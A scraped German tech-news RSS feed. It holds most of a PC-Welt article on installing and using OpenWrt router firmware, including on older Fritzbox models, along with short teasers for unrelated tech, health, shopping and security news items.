<p>Ein weiteres praktisches Szenario umfasst die Integration eines VPN-Dienstes. OpenWrt unterstützt zum Beispiel WireGuard oder OpenVPN. Damit lässt sich ein sicherer Zugriff auf das Heimnetz aus externen Netzen umsetzen. Ebenso kann der gesamte Datenverkehr über einen VPN-Anbieter geleitet werden.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"69f6eba17bf0e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/vpn_open_vpn_wireguard.jpg?quality=50&amp;strip=all&amp;w=1200" alt="VPN: Wireguard oder Open VPN?" class="wp-image-2883359" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">monticello / Shutterstock.com</p></div>



<h2 class="wp-block-heading toc">Neue Funktionen in OpenWrt 25.12.x</h2>



<p>Version 25.12 bringt mehrere technische Änderungen, die den Betrieb vereinfachen und erweitern. Eine zentrale Neuerung betrifft die Systemaktualisierung. Die Funktion “Attended SysUpgrade” integriert Updates direkt in die Weboberfläche. OpenWrt lädt passende Images automatisch und berücksichtigt installierte Pakete. </p>



<p>Dadurch entfällt die manuelle Neuinstallation von Erweiterungen nach einem Update. Ein weiterer Schritt betrifft den Paketmanager. Statt des bisherigen Systems kommt der Alpine Package Keeper zum Einsatz. Die neue Paketverwaltung arbeitet ressourcenschonend und nutzt signierte Pakete. Befehle ändern sich entsprechend, was bei manueller Administration berücksichtigt werden muss.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"69f6eba17cae8"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/openwrt-03.png" alt="OpenWrt herunterladen" class="wp-image-3111026" width="940" height="395" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Zusätzlich führt OpenWrt eine optionale Shell-Historie ein. Befehle bleiben damit auch nach Sitzungsende verfügbar. Die Integration eines Video-Feeds erweitert den Router um Funktionen zur Verarbeitung von Kamera-Streams. In Verbindung mit VPN ergibt sich eine einfache Lösung für entfernten Zugriff auf Videoquellen.</p>



<p>Die WLAN-Verwaltung wurde intern überarbeitet. Skripte basieren auf einer neuen Laufzeitumgebung, was die Wartbarkeit verbessert und bestimmte Abläufe beschleunigt. Ergänzend erweitert sich die Hardwareunterstützung um zahlreiche neue Geräte und Chipsätze.</p>



<h2 class="wp-block-heading toc">Vorteile im praktischen Einsatz</h2>



<p>OpenWrt bietet vollständige Kontrolle über das Netzwerk. Alle Konfigurationsparameter bleiben zugänglich und lassen sich an individuelle Anforderungen anpassen. Herstellerabhängigkeiten entfallen, da das System auf unterschiedlichen Geräten identisch arbeitet. Ein weiterer Vorteil liegt in der Update-Strategie. </p>



<p>OpenWrt erhält kontinuierlich Sicherheitsupdates, auch für ältere Hardware. Dadurch bleibt die Infrastruktur langfristig wartbar, auch wenn ein Gerät vom eigentlichen Hersteller nicht mehr unterstützt wird.</p>



<p>Die modulare Architektur ermöglicht eine gezielte Erweiterung. Sie installieren nur benötigte Komponenten und halten das System schlank. Gleichzeitig lassen sich komplexe Funktionen auf kompakten Geräten realisieren.</p>



<h2 class="wp-block-heading toc">Einschränkungen und Aufwand</h2>



<p>Die Flexibilität bringt einen höheren Konfigurationsaufwand mit sich. OpenWrt erfordert grundlegende Kenntnisse in Netzwerktechnik und Linux. Viele Funktionen stehen nicht automatisch bereit, sondern müssen eingerichtet werden. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"69f6eba17d9a3"}' data-wp-interactive="core/image" class="wp-block-image size-full is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/12/pcw02_Get-DnsClientServerAddress_RGBeci.jpg?quality=50&amp;strip=all" alt="Cmdlet Get-DnsClientServerAddress" class="wp-image-3018113" width="1024" height="421" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>In einem Heimnetz erfahren Sie über das Cmdlet Get-DnsClientServerAddress in der Regel lediglich die IP-Adresse Ihres Routers.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Auch die Hardware setzt Grenzen. Consumer-Router verfügen über begrenzten Speicher und Rechenleistung. Umfangreiche Dienste oder hohe Datenraten erfordern leistungsfähigere Geräte. Die Installation birgt ein gewisses Risiko. </p>



<p>Fehler beim Flash-Vorgang können ein Gerät unbrauchbar machen. Daher sind die Auswahl kompatibler Hardware und die Beachtung der jeweiligen Anleitung zwingend erforderlich.</p>



<h2 class="wp-block-heading toc">OpenWrt auf der Fritzbox</h2>



<p>OpenWrt lässt sich auf bestimmten Fritzbox-Modellen installieren, sofern die Hardware auf unterstützten SoCs basiert und der Bootprozess keine restriktiven Signaturprüfungen erzwingt. Relevant sind vor allem ältere Gerätegenerationen mit Lantiq- oder Atheros-Chipsätzen. Dazu zählen unter anderem AVM Fritzbox 7362 SL, AVM Fritzbox 7412, AVM Fritzbox 7430 sowie AVM Fritzbox 3490 (<a href="https://www.pcwelt.de/article/1157690/fritzbox-router-im-vergleich-das-beste-modell.html" target="_blank" rel="noreferrer noopener">Fritzbox-Router im Vergleich: Welches ist das beste Modell?</a>). Diese Geräte besitzen in der Regel ausreichend RAM und Flash für ein minimales OpenWrt-System und lassen sich über Recovery-Mechanismen oder modifizierte Firmware-Images flashen. Die Installation erfolgt modellabhängig über das AVM-Recovery-Tool, den EVA-Bootloader oder ein Web-Interface, sofern ein passendes Factory-Image vorliegt.</p>



<p>Technisch relevant bleibt die Trennung zwischen Router- und DSL-Funktion. Die DSL-Modems in Fritzboxen basieren auf proprietären Firmware-Blobs, für die keine freien Treiber verfügbar sind. OpenWrt nutzt daher bei diesen Geräten nur die Routing- und Switching-Komponenten. In der Praxis läuft die Box dann hinter einem externen Modem oder einem vorgeschalteten Router. Ethernet-Ports, VLAN-Konfiguration und Firewall arbeiten vollständig unter OpenWrt, das integrierte DSL-Interface bleibt jedoch ungenutzt.</p>



<p>Auch beim WLAN ergeben sich Unterschiede. Ältere Modelle mit Atheros- oder kompatiblen Chips lassen sich meist vollständig integrieren, inklusive WPA2 und WPA3. Bei Lantiq-Plattformen kann die WLAN-Leistung eingeschränkt sein, da Hardware-Offloading oder proprietäre Erweiterungen fehlen. <strong>Aber Achtung: Funktionen aus FRITZ!OS wie DECT-Basisstation, Telefonie oder AVM-spezifische Dienste stehen unter OpenWrt nicht zur Verfügung, da diese eng an die Originalfirmware gebunden sind.</strong></p>



<p>Neuere Geräte wie <a href="https://amazon.de/dp/B07SJTR4DD?tag=pcwelt.de-21&amp;ascsubtag=rss">AVM Fritzbox 7590</a> (<a href="https://www.pcwelt.de/article/1166494/test-die-fritzbox-7590-auf-dem-pruefstand.html" target="_blank" rel="noreferrer noopener">Testbericht</a>) oder <a href="https://www.pcwelt.de/article/1173254/avm-fritzbox-7530-wlan-router-test.html">AVM Fritzbox 7530 </a>(<a href="https://www.pcwelt.de/article/1173254/avm-fritzbox-7530-wlan-router-test.html" target="_blank" rel="noreferrer noopener">Testbericht)</a> verwenden modernere SoCs mit stärker abgesicherter Bootkette und proprietären Treibern für DSL und WLAN. Für diese Plattformen existiert kein stabiler OpenWrt-Support. Selbst wenn ein Start möglich wäre, fehlen zentrale Hardwarefunktionen oder die Initialisierung bleibt unvollständig. Kabelmodelle wie <a href="https://amazon.de/dp/B0CKTQSSW2?tag=pcwelt.de-21&amp;ascsubtag=rss">AVM Fritzbox 6660 Cable</a> sind grundsätzlich ausgeschlossen, da die DOCSIS-Komponenten vollständig proprietär arbeiten.</p>



<p>Ältere Fritzboxen eignen sich als kostengünstige OpenWrt-Systeme für Routing, VLAN-Segmentierung, VPN-Gateways oder als Access Point. Die Geräte erhalten aktuelle Kernel-Versionen und Sicherheitsupdates, obwohl der Hersteller keine Pflege mehr liefert. Für produktive Internetanschlüsse mit integrierter DSL- oder Kabelanbindung bleibt die Originalfirmware erforderlich, da OpenWrt diese Hardwarebereiche nicht unterstützt.</p>



<h2 class="wp-block-heading toc">Einsatz im kleinen Unternehmen</h2>



<p>In kleinen Unternehmen dient OpenWrt als flexible Netzwerkzentrale. Mehrere VLANs trennen interne Systeme, Gästezugänge und IoT-Komponenten. VPN-Verbindungen verbinden Außenstandorte oder ermöglichen mobilen Zugriff. Durch die Kombination aus Firewall, Routing und Zusatzdiensten lässt sich damit eine kompakte Infrastruktur ohne separate Appliances erstellen. Gleichzeitig bleibt die Konfiguration vollständig kontrollierbar und anpassbar.</p>



<p>OpenWrt ersetzt damit in vielen Szenarien klassische Router-Firmware und erweitert den Funktionsumfang deutlich.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA['Build AI that can accurately represent the full complexity of biology': Mark Zuckerberg wants to cure all diseases but needs far more data to deliver a digital twin of human cells—As genetic data becomes the next frontier, will you trust him with yo]]></title>
<description><![CDATA[Mark Zuckerberg backs $500 million push to build AI models of human cells as part of long-term effort to cure disease.]]></description>
<link>https://tsecurity.de/de/3482695/it-nachrichten/build-ai-that-can-accurately-represent-the-full-complexity-of-biology-mark-zuckerberg-wants-to-cure-all-diseases-but-needs-far-more-data-to-deliver-a-digital-twin-of-human-cells-as-genetic-data-becomes-the-next-frontier-will-you-trust-him-with-yo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3482695/it-nachrichten/build-ai-that-can-accurately-represent-the-full-complexity-of-biology-mark-zuckerberg-wants-to-cure-all-diseases-but-needs-far-more-data-to-deliver-a-digital-twin-of-human-cells-as-genetic-data-becomes-the-next-frontier-will-you-trust-him-with-yo/</guid>
<pubDate>Sat, 02 May 2026 20:32:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mark Zuckerberg backs $500 million push to build AI models of human cells as part of long-term effort to cure disease.]]></content:encoded>
</item>
<item>
<title><![CDATA[Why Savvy Gamers Are Embracing Digital Marketplaces for Gear and Games]]></title>
<description><![CDATA[Waiting in line for a midnight game release or scrambling to find a sold-out gaming headset...
The post Why Savvy Gamers Are Embracing Digital Marketplaces for Gear and Games appeared first on Fossbytes.]]></description>
<link>https://tsecurity.de/de/3480326/linux-tipps/why-savvy-gamers-are-embracing-digital-marketplaces-for-gear-and-games/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3480326/linux-tipps/why-savvy-gamers-are-embracing-digital-marketplaces-for-gear-and-games/</guid>
<pubDate>Fri, 01 May 2026 14:24:54 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Waiting in line for a midnight game release or scrambling to find a sold-out gaming headset...</p>
<p>The post <a rel="nofollow" href="https://fossbytes.com/why-gamers-love-digital-marketplaces/">Why Savvy Gamers Are Embracing Digital Marketplaces for Gear and Games</a> appeared first on <a rel="nofollow" href="https://fossbytes.com/">Fossbytes</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Treatment Could Reverse Osteoarthritis Joint Damage With a Single Injection]]></title>
<description><![CDATA[Osteoarthritis has no cure, but researchers have developed new therapies that help aging or damaged joints repair themselves in a matter of weeks.]]></description>
<link>https://tsecurity.de/de/3479990/it-nachrichten/this-treatment-could-reverse-osteoarthritis-joint-damage-with-a-single-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3479990/it-nachrichten/this-treatment-could-reverse-osteoarthritis-joint-damage-with-a-single-injection/</guid>
<pubDate>Fri, 01 May 2026 11:31:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Osteoarthritis has no cure, but researchers have developed new therapies that help aging or damaged joints repair themselves in a matter of weeks.]]></content:encoded>
</item>
<item>
<title><![CDATA[Grab Apple's M5 MacBook Air with 32GB RAM for $1,399, plus save on every model]]></title>
<description><![CDATA[Save on every new M5 MacBook Air today, with a 32GB RAM spec dropping to $1,399.Save on every M5 MacBook Air, with a $100 discount on a 32GB RAM config - Image credit: AppleApple Premier Partner Expercom is running a sale on every M5 MacBook Air, with this 13-inch configuration with 32GB of RAM a...]]></description>
<link>https://tsecurity.de/de/3478577/ios-mac-os/grab-apples-m5-macbook-air-with-32gb-ram-for-1399-plus-save-on-every-model/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3478577/ios-mac-os/grab-apples-m5-macbook-air-with-32gb-ram-for-1399-plus-save-on-every-model/</guid>
<pubDate>Thu, 30 Apr 2026 20:09:07 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Save on every new M5 MacBook Air today, with a 32GB RAM spec dropping to $1,399.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67509-142169-m5-macbook-air-32gb-ram-deal-xl.jpg" alt="Open MacBook Air laptop in Midnight with abstract blue wave pattern on the screen against a blue gradient background, overlaid large white text reading M5 AIR 32GB RAM"><br><span>Save on every M5 MacBook Air, with a $100 discount on a 32GB RAM config - Image credit: Apple</span></div><br>Apple Premier Partner Expercom is <a href="https://expercom.com/collections/macbook-air-family?sca_ref=7663387.E9TS6ofGaRMDp&amp;sca_source=da-maca-13in-m5-32gb-1399-043026" rel="nofollow" target="_blank">running a sale on every M5 MacBook Air</a>, with this 13-inch configuration with 32GB of RAM and 512GB of storage <a href="https://expercom.com/products/13-inch-macbook-air-m5?variant=44928810090530&amp;sca_ref=7663387.E9TS6ofGaRMDp&amp;sca_source=da-maca-13in-m5-32gb-1399-043026" rel="nofollow" target="_blank">marked down to $1,399</a> after a $100 discount.<br><br><a href="https://expercom.com/collections/macbook-air-family?sca_ref=7663387.E9TS6ofGaRMDp&amp;sca_source=da-maca-13in-m5-32gb-1399-043026" rel="nofollow" class="deal-highlight">Save on every M5 MacBook Air</a><br><br><br> <a href="https://appleinsider.com/articles/26/04/30/grab-apples-m5-macbook-air-with-32gb-ram-for-1399-plus-save-on-every-model?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244204?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why Savvy Gamers Are Embracing Digital Marketplaces for Gear and Games]]></title>
<description><![CDATA[Waiting in line for a midnight game release or scrambling to find a sold-out gaming headset...
The post Why Savvy Gamers Are Embracing Digital Marketplaces for Gear and Games appeared first on Fossbytes.]]></description>
<link>https://tsecurity.de/de/3477490/it-nachrichten/why-savvy-gamers-are-embracing-digital-marketplaces-for-gear-and-games/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3477490/it-nachrichten/why-savvy-gamers-are-embracing-digital-marketplaces-for-gear-and-games/</guid>
<pubDate>Thu, 30 Apr 2026 14:17:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Waiting in line for a midnight game release or scrambling to find a sold-out gaming headset...</p>
<p>The post <a rel="nofollow" href="https://fossbytes.com/why-savvy-gamers-are-embracing-digital-marketplaces-for-gear-and-games/">Why Savvy Gamers Are Embracing Digital Marketplaces for Gear and Games</a> appeared first on <a rel="nofollow" href="https://fossbytes.com/">Fossbytes</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple China Promotes Apple Watch Rescue Stories In New Podcast]]></title>
<description><![CDATA[Apple recently rolled out a fresh marketing campaign in China to highlight the life-saving capabilities of its smart wearables. The initiative, named "Thankfully, I was wearing it," focuses on real stories from three Apple Watch owners who survived serious emergencies. 



By sharing these person...]]></description>
<link>https://tsecurity.de/de/3477477/ios-mac-os/apple-china-promotes-apple-watch-rescue-stories-in-new-podcast/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3477477/ios-mac-os/apple-china-promotes-apple-watch-rescue-stories-in-new-podcast/</guid>
<pubDate>Thu, 30 Apr 2026 14:05:31 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple recently rolled out a fresh marketing campaign in China to highlight the life-saving capabilities of its smart wearables. The initiative, named "Thankfully, I was wearing it," focuses on real stories from three Apple Watch owners who survived serious emergencies. 



By sharing these personal accounts, the company hopes to show everyday buyers how simple health and safety features can genuinely make a massive difference during a sudden medical crisis or accident.



The campaign shares real stories from a special podcast interview



To make the campaign feel personal, the tech brand partnered with popular Chinese interviewer Li Jing for a special podcast episode. The broadcast is part of the "You Just Can't Settle Down" series and runs for an entire hour. It features guests Me Junyan, Chen Huimin, and Yang Xiao. During the show, they explain exactly how their wearable devices stepped in when things went wrong.



One guest talks about surviving a severe car crash that left him completely unconscious. In that terrifying moment, the watch automatically detected the heavy impact. It then dialed emergency services to get help right away without any human input. Other stories in the episode cover similar close calls involving the fall detection system and sudden heart rate warnings.



The advertising agency behind the push noted that the campaign title actually came from the users themselves. People who survive these scary situations constantly use that exact phrase when talking about their devices online. The company decided to turn that natural customer reaction into the main message of its new safety push.]]></content:encoded>
</item>
<item>
<title><![CDATA[From Robotic to Remarkable: How to Use a Free AI Detector and Bypasser to Level Up Your Writing]]></title>
<description><![CDATA[In this post, I will show you how to use a free AI detector and bypasser to level up your writing. Let’s be honest: AI has changed the game for anyone who writes. Whether you’re a college student racing against a midnight deadline or a professional drafting a high-stakes report, tools like ChatGP...]]></description>
<link>https://tsecurity.de/de/3476685/it-security-nachrichten/from-robotic-to-remarkable-how-to-use-a-free-ai-detector-and-bypasser-to-level-up-your-writing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3476685/it-security-nachrichten/from-robotic-to-remarkable-how-to-use-a-free-ai-detector-and-bypasser-to-level-up-your-writing/</guid>
<pubDate>Thu, 30 Apr 2026 09:35:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this post, I will show you how to use a free AI detector and bypasser to level up your writing. Let’s be honest: AI has changed the game for anyone who writes. Whether you’re a college student racing against a midnight deadline or a professional drafting a high-stakes report, tools like ChatGPT have become […]</p>
<p>The post <a href="https://secureblitz.com/how-to-use-a-free-ai-detector-and-bypasser/">From Robotic to Remarkable: How to Use a Free AI Detector and Bypasser to Level Up Your Writing</a> appeared first on <a href="https://secureblitz.com/">SecureBlitz Cybersecurity</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I’m addicted to checking my phone. Could a blocking device stop me?]]></title>
<description><![CDATA[Physical phone blocking devices, powered by NFC wireless technology, are becoming a popular solution for doomscrolling. Brigid Delaney puts one to the testWake up, 100 messages from group chat overnight about something – what? another assassination attempt; a village destroyed in Lebanon; the foo...]]></description>
<link>https://tsecurity.de/de/3474975/it-nachrichten/im-addicted-to-checking-my-phone-could-a-blocking-device-stop-me/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3474975/it-nachrichten/im-addicted-to-checking-my-phone-could-a-blocking-device-stop-me/</guid>
<pubDate>Wed, 29 Apr 2026 17:17:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Physical phone blocking devices, powered by NFC wireless technology, are becoming a popular solution for doomscrolling. Brigid Delaney puts one to the test</p><p>Wake up, 100 messages from group chat overnight about something – what? another assassination attempt; a village destroyed in Lebanon; the football result in England; the weather in Iran being manipulated; the pesticides causing lung and bowel cancer, so everyone who eats salads is now at risk of cancer; meditate for 20 minutes, then fire up x.com, a place I thought I’d never want to revisit, with its carnival barkers and supplement salesman, and have you seen the Lego thing calling Trump a paedo?, <em>you gotta see the Lego thing</em>, and this is before my first coffee, yet x.com is the coffee<em> and the tea</em>, whatever Elon has done to the For You algorithm is <a href="https://www.theguardian.com/law/2026/mar/26/tech-companies-social-media-addictive-products-meta-youtube">evil genius</a>, it’s like the global collective id, nasty and funny and addictive and compelling – like gawking at a car crash, like soaking in a hot bubble bath of anger, and memes, and geopolitical dramas, and Trump, Trump, Trump – soaking in Trump, and then, For Me (just as Elon promised).</p><p>So begins <a href="https://www.theguardian.com/books/2026/apr/27/the-one-change-that-worked-i-swapped-doomscrolling-for-reading-comic-books">the circuit around my phone</a>, that goes all day and night, around the tiny screen with its icons (when a born-again Christian once told me he had favourite icons, for a long time I thought he meant apps, not pictures of the Virgin Mary). I started to feel like I was in Canberra, on one of those enormous roundabouts, rotating between the icons – not Joseph, not Jesus, but X and WhatsApp and TikTok and even LinkedIn for Christ sakes – round and round from one app to the next, just checking, checking in case something is happening. I watched tiny videos and maybe, occasionally, got distracted by the novel I am meant to be writing, which is due on 31 July. But the novel is boring, just a static Word doc on a screen, it’s not <em>giving</em>; it’s taking hard work. So I spend six minutes with my novel, and then it’s time to go back to my phone, to circle the roundabout visiting all my icons again, like a demented Stations of the Cross, because I can’t focus, I just can’t focus on work right now when there is so much good scrolling to do …</p> <a href="https://www.theguardian.com/technology/2026/apr/30/phone-addiction-cure-blocking-device">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazon slashes $200 off M5 Max 16-inch MacBook Pro with month-end deal]]></title>
<description><![CDATA[Pick up Apple's new 16-inch MacBook Pro with M5 Max for $3,699 thanks to a triple-digit price cut at Amazon.Save $200 on Apple's M5 Max MacBook Pro 16-inch.Amazon's month-end 2026 MacBook Pro sale is in effect, with triple-digit savings on multiple models. This M5 Max 16-inch configuration is ent...]]></description>
<link>https://tsecurity.de/de/3471892/ios-mac-os/amazon-slashes-200-off-m5-max-16-inch-macbook-pro-with-month-end-deal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3471892/ios-mac-os/amazon-slashes-200-off-m5-max-16-inch-macbook-pro-with-month-end-deal/</guid>
<pubDate>Tue, 28 Apr 2026 18:08:28 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Pick up Apple's new 16-inch MacBook Pro with M5 Max for $3,699 thanks to a triple-digit price cut at Amazon.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67484-142055-16-inch-macbook-pro-m5-max-deal-xl.jpg" alt="Silver MacBook Pro laptop with logo closed on a desk, Midnight AirPods Max headphones in front, small potted plant left, camera gear and orange drives right, bright green NEW badge above."><br><span>Save $200 on Apple's M5 Max MacBook Pro 16-inch.</span></div><br>Amazon's month-end 2026 MacBook Pro sale is in effect, with triple-digit savings on multiple models. <a href="https://www.amazon.com/dp/B0GR1G1FY7/?tag=apinsiderdeals-20" rel="nofollow" target="_blank">This M5 Max 16-inch configuration</a> is enticing at $200 off, bringing the price down to $3,699.<br><br><a href="https://www.amazon.com/dp/B0GR1G1FY7/?tag=apinsiderdeals-20" rel="nofollow" class="deal-highlight">Buy 16" MacBook Pro M5 Max for $3,699</a><br><br><br> <a href="https://appleinsider.com/articles/26/04/28/amazon-slashes-200-off-m5-max-16-inch-macbook-pro-with-month-end-deal?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244185?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[New 'Firestarter' malware flames on in spite of Cisco firewall updates and security patches]]></title>
<description><![CDATA[Security pros are warning about custom malware targeting Cisco firewalls, and surviving upgrades and reboots.]]></description>
<link>https://tsecurity.de/de/3468653/it-nachrichten/new-firestarter-malware-flames-on-in-spite-of-cisco-firewall-updates-and-security-patches/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3468653/it-nachrichten/new-firestarter-malware-flames-on-in-spite-of-cisco-firewall-updates-and-security-patches/</guid>
<pubDate>Mon, 27 Apr 2026 17:31:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security pros are warning about custom malware targeting Cisco firewalls, and surviving upgrades and reboots.]]></content:encoded>
</item>
<item>
<title><![CDATA[Darum sollten Sie OpenWrt auf Ihrem Router installieren]]></title>
<description><![CDATA[OpenWrt ist ein Linux-basiertes Betriebssystem für Router und andere eingebettete Systeme, auf denen Linux grundsätzlich installiert werden kann. Die Software ersetzt die herstellereigene Firmware vollständig und stellt ein frei konfigurierbares System bereit. 



Im Gegensatz zu klassischen Rout...]]></description>
<link>https://tsecurity.de/de/3467369/it-nachrichten/darum-sollten-sie-openwrt-auf-ihrem-router-installieren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3467369/it-nachrichten/darum-sollten-sie-openwrt-auf-ihrem-router-installieren/</guid>
<pubDate>Mon, 27 Apr 2026 10:46:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://openwrt.org/" target="_blank" rel="noreferrer noopener">OpenWrt</a> ist ein Linux-basiertes Betriebssystem für Router und andere eingebettete Systeme, auf denen Linux grundsätzlich installiert werden kann. Die Software ersetzt die herstellereigene Firmware vollständig und stellt ein frei konfigurierbares System bereit. </p>



<p>Im Gegensatz zu klassischen Router-Betriebssystemen arbeitet OpenWrt mit einem beschreibbaren Dateisystem und integriertem Paketmanagement. Dadurch erweitert sich der Router funktional zu einer Plattform, auf der sich zahlreiche Dienste nach Bedarf installieren und betreiben lassen.</p>



<p>Das System läuft auf einer Vielzahl unterschiedlicher Hardwarearchitekturen. <a href="https://www.amazon.de/s?k=openwrt+router&amp;tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Neben klassischen Consumer-Routern</a> unterstützt OpenWrt ARM- und MIPS-Plattformen sowie x86-Systeme. Diese breite Unterstützung ermöglicht einen geräteunabhängigen Betrieb mit identischer Oberfläche und vergleichbarer Konfiguration.</p>


